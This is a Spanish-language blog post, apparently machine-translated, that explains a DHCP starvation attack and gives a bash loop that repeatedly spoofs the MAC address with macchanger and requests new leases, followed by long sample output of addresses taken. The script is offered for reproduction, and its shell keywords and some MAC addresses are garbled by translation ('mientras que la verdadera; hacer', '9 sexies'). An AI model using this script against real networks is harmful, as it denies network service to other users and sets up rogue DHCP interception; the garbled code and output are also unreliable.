Un ataque "DHCP hambre" Trata de inundar con Peticiones "DHCP_REQUEST" DHCP Servidor al, Y falsas con la ayuda de Direcciones MAC, párr · intentar agotar su espacio de Direcciones asignables. El Objetivo es Que El Servidor DHCP no Pueda respondedor una Otros Clientes y poder Realizar Otros Tipos de Ataques (rogue DHCP).
Realmente ESTAMOS hablandos de Un tipo de ataque muy Efectivo y Fácil de Realizar. Unicamente DEBEMOS Tener dhclient y macchanger instalados en La Máquina, y Con el guión siguiente, Podremos reproducirlo Problemas pecado:
sh -v starve.sh
#! / bin / bash
mientras que la verdadera; hacer
# Matar a todos los clientes DHCP que ejecutan - por si acaso
killall dhclient
rm -f /var/run/dhclient.pid
# Derribar la interfaz
ifconfig eth0 down
# Cambiar la dirección MAC de la interfaz e imprimir la nueva dirección MAC
macchanger -a eth0 2> & 1 | grep Faked
# Trae la interfaz hasta
ifconfig eth0
# Hacer un nuevo contrato de arrendamiento de DHCP
eth0 dhclient 2> & 1 | grep DHCPACK
hecho
Falsificada MAC: 00: 10: a8: 19: ef: 88 (Reliance Computer Corp.)
DHCPACK de 192.168.0.101 desde 192.168.0.1
MAC falsa: 00: 0c: 5c: cd: fa: df (Sistemas GTN Bv)
DHCPACK de 192.168.0.102 desde 192.168.0.1
Falsificada MAC: 00: 09: e6: 46: 45: f3 (Ciber conmutación Inc.)
DHCPACK de 192.168.0.103 desde 192.168.0.1
MAC falsa: 00: 0d: f1: 7b: 03: 1c (Ionix Inc.)
DHCPACK de 192.168.0.104 desde 192.168.0.1
Falsificada MAC: 00: 09: 63: e4: c5: 14 (Dominio Lasercom Inc.)
DHCPACK de 192.168.0.105 desde 192.168.0.1
MAC falsa: 00: 10: d6: 45: 8b: 59 (Itt - A / cd)
DHCPACK de 192.168.0.106 desde 192.168.0.1
MAC falsa: 00: a0: 8b: 4b: 90: ae (Aston Electronic Designs Ltd.)
DHCPACK de 192.168.0.107 desde 192.168.0.1
Falsificada MAC: 00: 50: b6: 9c: 26: 79 (. Buen Camino Ind Co., Ltd.)
DHCPACK de 192.168.0.108 desde 192.168.0.1
Falsificada MAC: 00: 30: 44: 59: 60: 85 (Portsmith Llc)
DHCPACK de 192.168.0.109 desde 192.168.0.1
MAC falsa: 00: 10: 6e: 2d: 70: 7a (. Tadiran Com Ltd.)
DHCPACK de 192.168.0.110 desde 192.168.0.1
MAC falsa: 00: 90: 2c: 96: f1: 77 (Datos y Control Equipment Ltd.)
DHCPACK de 192.168.0.111 desde 192.168.0.1
MAC falsa: 00: 20: cc: dd: 04: 91 (Digital Services, Ltd.)
DHCPACK de 192.168.0.112 desde 192.168.0.1
MAC falsa: 00: 0F: 0d: e0: 60: ae (Hunt Electronic Co., Ltd.)
DHCPACK de 192.168.0.113 desde 192.168.0.1
Falsificada MAC: 00: 80: 39: ba: 9d: 42 (Alcatel Stc Australia)
DHCPACK de 192.168.0.114 desde 192.168.0.1
MAC falsa: 00: 30: d8: 1e: d4: aa (Sitek)
DHCPACK de 192.168.0.115 desde 192.168.0.1
MAC falsa: 00: 01: ser: 3e: ac: c1 (GigaLINK Co., Ltd.)
DHCPACK de 192.168.0.116 desde 192.168.0.1
MAC falsa: 00: 80: 9 sexies: 81: c9: cf (Datus Gmbh)
DHCPACK de 192.168.0.117 desde 192.168.0.1
MAC falsa: 00: 80: f2: f4: 3e: 39 (Raycom Systems Inc)
DHCPACK de 192.168.0.118 desde 192.168.0.1
MAC falsa: 00: 0e: 1e: c3: c8: 19 (Privado)
DHCPACK de 192.168.0.119 desde 192.168.0.1
Falsificada MAC: 00: 40: 35: 90: 91: 9 sexies (Opcom)
DHCPACK de 192.168.0.120 desde 192.168.0.1
Falsificada MAC: 00: 80: 24: ad: fb: d9 (Kalpana, Inc.)
DHCPACK de 192.168.0.121 desde 192.168.0.1
MAC falsa: 00: e0: ee: b5: 4f: 15 (Marel Hf)
DHCPACK de 192.168.0.122 desde 192.168.0.1
Falsificada MAC: 00: 50: 03: 17: 23: 47 (Gretag Macbeth Ag)
DHCPACK de 192.168.0.123 desde 192.168.0.1
MAC falsa: 00: e0: ef: 28: db: 37 (Dionex)
DHCPACK de 192.168.0.124 desde 192.168.0.1
MAC falsa: 00: 0F: a5: ba: 1f: 1d (SMP / Bwa Technology GmbH)
DHCPACK de 192.168.0.125 desde 192.168.0.1
MAC falsa: 00: 08: 1e: 5a: e3: d9 (Repeatit Ab)
DHCPACK de 192.168.0.126 desde 192.168.0.1
Falsificada MAC: 00: 0e: 52: 7f: eb: c5 (Optium Corporation)
DHCPACK de 192.168.0.127 desde 192.168.0.1
Falsificada MAC: 00: 50: 10: b6: f1: f0 (Novanet Learning, Inc.)
DHCPACK de 192.168.0.128 desde 192.168.0.1
Falsificada MAC: 00: 04: 2a: 14: 14: 11 (Redes inalámbricas, Inc.)
DHCPACK de 192.168.0.129 desde 192.168.0.1
Falsificada MAC: 00: 60: b2: 49: 66: ac (Control de Procesos Corp.)
DHCPACK de 192.168.0.130 desde 192.168.0.1
Falsificada MAC: 00: a0: 44: 14: 5e: 8a (NTT Es Co., Ltd.)
DHCPACK de 192.168.0.131 desde 192.168.0.1
Falsificada MAC: 00: 90: f5: 06: 6d: f3 (Clevo Co.)
.
.
.
.
DHCPACK de 192.168.0.196 desde 192.168.0.1
Fingido MAC: 00: 30: 40: a3: d0: 37 (Cisco Systems, Inc.)
DHCPACK de 192.168.0.197 desde 192.168.0.1
Falsificada MAC: 00: 20: 94: 9 sexies: c7: 32 (Cubix Corporation)
DHCPACK de 192.168.0.198 desde 192.168.0.1
Falsificada MAC: 00: 40: 9d: f9: 15: 13 (Digiboard, Inc.)
Falsificada MAC: 00: 05: 0d: 10: 15: 2f (Midstream Technologies, Inc.)
Falsificada MAC: 00: 0d: 3c: 7e: ea: 92 (I.tech dinámico Ltd)
Falsificada MAC: 00: 07: dc: 51: c3: e9 (Atek Co, Ltd)
Falsificada MAC: 00: 02: 18: 3c: 73: cb (Advanced Scientific Corp)
Fuentes:
No hay comentarios:
Publicar un comentario